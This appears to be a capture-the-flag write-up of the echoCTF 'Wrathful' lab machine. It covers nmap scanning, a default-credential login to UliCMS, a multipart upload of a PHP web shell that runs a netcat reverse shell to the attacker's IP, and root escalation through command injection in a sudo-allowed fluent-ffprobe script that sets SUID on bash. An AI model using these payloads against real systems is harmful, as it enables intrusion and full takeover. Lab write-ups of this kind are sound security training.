Wrathful (Intermediate)
Post

Wrathful (Intermediate)

25/02/2025
Preview Image
shuciran
3
Host entries
1

10.0.160.232

Content

  • Default Credentials
  • Ulicms - Remote Code Execution (RCE)
  • Arbitrary Command Injection in fluent-ffprobe

Reconnaissance

Initial reconnaissance for TCP ports

1
2
3
4

nmap -p- -sS --open --min-rate 500 -Pn -n -vvvv -oG allPorts 10.0.160.237
# Ports scanned: TCP(65535;1-65535) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.0.160.237 ()   Status: Up
Host: 10.0.160.237 ()   Ports: 22/open/tcp//ssh///, 80/open/tcp//http///

Services and Versions running:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

nmap -p22,80 -sCV -n -Pn -vvvv -oN targeted 10.0.160.237
Nmap scan report for 10.0.160.237
Host is up, received user-set (0.18s latency).
Scanned at 2025-02-25 12:27:53 EST for 41s

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey: 
|   256 3a:29:65:08:4d:a0:e7:f1:11:ba:00:4a:13:e6:7c:46 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOYx6YnF9iFKePvj48+MTqOwkSZzjqnmtKIKUVWVEzMp
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.61 ((Debian))
| http-methods: 
|_  Supported Methods: GET
|_http-title: Sample Page > Welcome
|_http-server-header: Apache/2.4.61 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Exploitation

There is a Web Service running on port 80 called UliCMS looking for exploits on it, we identified the following Ulicms - Remote Code Execution (RCE), but the exploit requires authentication, I then tried to login using Default Credentials, and I got the pair admin:admin1234, with this, we can execute the script which is an OS Command Injection vulnerability, using the following POST request, which uploads a .phar malicious file to our profile image:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86

POST /admin/index.php HTTP/1.1
Host: 10.0.160.237
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://10.0.160.237/admin/index.php?action=admin_edit&id=1&ref=home
Content-Type: multipart/form-data; boundary=---------------------------343146591322721372102377782251
Content-Length: 2239
Origin: http://10.0.160.237
Connection: keep-alive
Cookie: 668c349d57509_SESSION=6pd2gi1hq4amrdg96k71hn0qi4
Upgrade-Insecure-Requests: 1

-----------------------------343146591322721372102377782251
Content-Disposition: form-data; name="csrf_token"

62140af85d6eb36eac83a3996ab25cfd
-----------------------------343146591322721372102377782251
Content-Disposition: form-data; name="sClass"

UserController
-----------------------------343146591322721372102377782251
Content-Disposition: form-data; name="sMethod"

update
-----------------------------343146591322721372102377782251
Content-Disposition: form-data; name="avatar"; filename="exploit.phar"
Content-Type: application/octet-stream

<?php echo system("nc -e /bin/bash 10.10.5.122 1234"); ?>

-----------------------------343146591322721372102377782251
Content-Disposition: form-data; name="edit_admin"

edit_admin
-----------------------------343146591322721372102377782251
Content-Disposition: form-data; name="id"

1
-----------------------------343146591322721372102377782251
Content-Disposition: form-data; name="firstname"

adm
-----------------------------343146591322721372102377782251
Content-Disposition: form-data; name="lastname"

in
-----------------------------343146591322721372102377782251
Content-Disposition: form-data; name="email"

admin@wrathful.echocity-f.com
-----------------------------343146591322721372102377782251
Content-Disposition: form-data; name="password"


-----------------------------343146591322721372102377782251
Content-Disposition: form-data; name="password_repeat"


-----------------------------343146591322721372102377782251
Content-Disposition: form-data; name="group_id"

1
-----------------------------343146591322721372102377782251
Content-Disposition: form-data; name="homepage"


-----------------------------343146591322721372102377782251
Content-Disposition: form-data; name="html_editor"

ckeditor
-----------------------------343146591322721372102377782251
Content-Disposition: form-data; name="admin"

1
-----------------------------343146591322721372102377782251
Content-Disposition: form-data; name="default_language"

en
-----------------------------343146591322721372102377782251
Content-Disposition: form-data; name="about_me"


-----------------------------343146591322721372102377782251--

File upload error may occur, but this does not mean that the file is not uploaded and the file location is shown in the error

1

Imagine\Exception\RuntimeException: Unable to open image /var/www/html/content/tmp/67bdfbd4298b8.phar

Then all we need to do is visit the web page:

1

http://10.0.160.237/content/tmp/67bdfbd4298b8.phar

Privilege Escalation

For the Privilege Escalation I then proceed to execute the command sudo -l and I can execute a script as user root without password:

1
2
3
4
5
6

www-data@wrathful:/var/www/html/content/tmp$ sudo -l
Matching Defaults entries for www-data on wrathful:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User www-data may run the following commands on wrathful:
    (ALL : ALL) NOPASSWD: /usr/local/bin/ffprobe

Its content is like this:

1
2
3
4
5
6
7

#! /usr/bin/env node
const fluent_ffprobe = require("fluent-ffprobe")
var args = process.argv.slice(2);
var backParams=args[0]
var file=args[1];
var frontParams=args[2]
console.log(fluent_ffprobe.get_raw(backParams, file, frontParams));

As usual, the vulnerability relays on the imported library, in this case fluent-ffprobe, there is a vulnerability reported as Arbitrary Command Injection, after reading the article I came with the following payload:

1
2
3
4

www-data@wrathful:/tmp$ PAYLOAD='$(/bin/bash -c "chmod +s /bin/bash")'
www-data@wrathful:/tmp$ sudo /usr/local/bin/ffprobe "$PAYLOAD" dummy
www-data@wrathful:/tmp$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1265648 Apr 23  2023 /bin/bash

And we ARE INSIDEEEE!!!

Post Exploitation

Flags are stored at:

/etc/passwd /etc/shadow environment variables (env command) /root

Credentials

  • Credentials identified for UliCMS are admin:admin1234

Notes

  • No fancy tricks here, all you need to search for is a good exploitation and default credentials.

References

echoCTF, Intermediate
Default Credentials RCE Arbitrary Command Injection UliCMS